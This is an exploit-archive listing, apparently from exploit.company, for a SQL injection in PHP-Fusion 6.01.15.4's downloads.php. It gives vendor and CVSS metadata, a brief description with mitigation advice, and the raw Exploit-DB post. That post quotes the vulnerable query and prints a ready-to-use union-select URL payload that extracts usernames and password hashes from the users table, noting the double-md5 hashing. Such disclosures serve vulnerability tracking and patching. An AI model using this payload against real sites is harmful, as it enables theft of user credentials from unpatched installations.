PHP-Fusion - exploit.company

vendor:

PHP-Fusion

by:

Inj3ct0r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP-Fusion

Affected Version From: 6.01.15.4

Affected Version To: 6.01.15.4

Patch Exists: NO

Related CWE: N/A

CPE: a:php-fusion:php-fusion:6.01.15.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability

A vulnerability exists in the downloads.php file of PHP-Fusion version 6.01.15.4, where the parameter $page_id is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a crafted request with a malicious SQL query to the downloads.php file. The malicious query can be used to extract sensitive information from the database, such as usernames and passwords, which are encrypted using the md5 (md5 ($ pass)) algorithm.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

===================================================================
PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability
===================================================================
#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


Product: PHP-Fusion 
Version: 6.01.15.4

Error in file downloads.php

PHP code:

$result = dbquery("SELECT * FROM ".$db_prefix."downloads WHERE download_id='$page_id'");

A vulnerable parameter $ page_id


Exploit:

downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*

password is encrypted by: md5 (md5 ($ pass))


# ~  - [ [ : Inj3ct0r : ] ]